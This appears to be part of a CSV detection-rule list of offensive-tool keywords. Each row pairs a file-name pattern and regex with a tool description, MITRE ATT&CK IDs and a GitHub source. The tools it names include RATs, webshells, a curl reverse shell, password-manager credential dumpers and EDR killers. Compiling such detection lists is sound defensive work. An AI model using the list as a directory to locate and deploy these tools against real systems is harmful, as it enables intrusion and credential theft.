"*\CultesDesGoules.txt*",".{0,1000}\\CultesDesGoules\.txt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","14702"
"*\curlshell.py*",".{0,1000}\\curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","14703"
"*\curlshell-main*",".{0,1000}\\curlshell\-main.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","14704"
"*\curlshell-main\*",".{0,1000}\\curlshell\-main\\.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","14705"
"*\CurrentControlSet\Services\BadWindowsService*",".{0,1000}\\CurrentControlSet\\Services\\BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#registry","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14711"
"*\CurrentVersion\Run\XenoUpdateManager*",".{0,1000}\\CurrentVersion\\Run\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","14733"
"*\CustomEncoding.cpp*",".{0,1000}\\CustomEncoding\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","14744"
"*\cve-2014-4113.x64.dll*",".{0,1000}\\cve\-2014\-4113\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14745"
"*\cve-2014-4113.x86.dll*",".{0,1000}\\cve\-2014\-4113\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14746"
"*\cve-2015-1701.x64.dll*",".{0,1000}\\cve\-2015\-1701\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14747"
"*\cve-2015-1701.x86.dll*",".{0,1000}\\cve\-2015\-1701\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14748"
"*\cve-2016-0051.x86.dll*",".{0,1000}\\cve\-2016\-0051\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14749"
"*\CVE-2020-0796.x64.dll*",".{0,1000}\\CVE\-2020\-0796\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14750"
"*\CVE-2021-1675.x64.dll*",".{0,1000}\\CVE\-2021\-1675\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14751"
"*\CVE-2024-49138-POC-main*",".{0,1000}\\CVE\-2024\-49138\-POC\-main.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","14752"
"*\Cyber Shell (v 1.0).php*",".{0,1000}\\Cyber\sShell\s\(v\s1\.0\)\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14753"
"*\CyberSpy5.Asp*",".{0,1000}\\CyberSpy5\.Asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14759"
"*\d00r_py3.py*",".{0,1000}\\d00r_py3\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14760"
"*\d0nut.html*",".{0,1000}\\d0nut\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14761"
"*\D1rkInject\*",".{0,1000}\\D1rkInject\\.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","14762"
"*\dacledit-*.bak*",".{0,1000}\\dacledit\-.{0,1000}\.bak.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14763"
"*\dacledit.py*",".{0,1000}\\dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14764"
"*\dacledit.py*",".{0,1000}\\dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14765"
"*\daclread.py*",".{0,1000}\\daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","14766"
"*\dafthack\MSOLSpray*",".{0,1000}\\dafthack\\MSOLSpray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","14767"
"*\dagonlocker.html*",".{0,1000}\\dagonlocker\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14768"
"*\Dandelion_RAT.exe*",".{0,1000}\\Dandelion_RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14785"
"*\dangerousACL_Computer.txt*",".{0,1000}\\dangerousACL_Computer\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","14786"
"*\dangerousACL_Groups.txt*",".{0,1000}\\dangerousACL_Groups\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","14787"
"*\Dark Comet Stub Crypter.exe*",".{0,1000}\\Dark\sComet\sStub\sCrypter\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14788"
"*\darkangels.txt*",".{0,1000}\\darkangels\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14789"
"*\DarkCoderSc.exe*",".{0,1000}\\DarkCoderSc\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14790"
"*\DarkComet.exe*",".{0,1000}\\DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14791"
"*\DarkComet.exe*",".{0,1000}\\DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14792"
"*\DarkComet_Full_setup.exe*",".{0,1000}\\DarkComet_Full_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14793"
"*\DarkComet_Module_setup.exe*",".{0,1000}\\DarkComet_Module_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14794"
"*\darkexe.py*",".{0,1000}\\darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","14795"
"*\darkfire.bat*",".{0,1000}\\darkfire\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14796"
"*\DarkLoadLibrary.*",".{0,1000}\\DarkLoadLibrary\..{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","14797"
"*\Darkside.exe*",".{0,1000}\\Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","14798"
"*\Darkside.sln*",".{0,1000}\\Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","14799"
"*\Dark-Virus.exe*",".{0,1000}\\Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14800"
"*\Dark-Virus.exe*",".{0,1000}\\Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14801"
"*\DarkWidow\src\*",".{0,1000}\\DarkWidow\\src\\.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","14802"
"*\dashlane\getCredsdashlaneEntries.h*",".{0,1000}\\dashlane\\getCredsdashlaneEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14804"
"*\dashlane\getCredsdashlaneMaster.h*",".{0,1000}\\dashlane\\getCredsdashlaneMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14805"
"*\Data breach warning.txt*",".{0,1000}\\Data\sbreach\swarning\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14806"
"*\Data\WinAuditDB.mdb*",".{0,1000}\\Data\\WinAuditDB\.mdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14807"
"*\dazzleUP_Reflective_DLL.x64.dll*",".{0,1000}\\dazzleUP_Reflective_DLL\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14810"
"*\dbgview64-infected.exe*",".{0,1000}\\dbgview64\-infected\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14811"
"*\dbms\fingerprint.py*",".{0,1000}\\dbms\\fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","14812"
"*\dcomexec.exe*",".{0,1000}\\dcomexec\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14814"
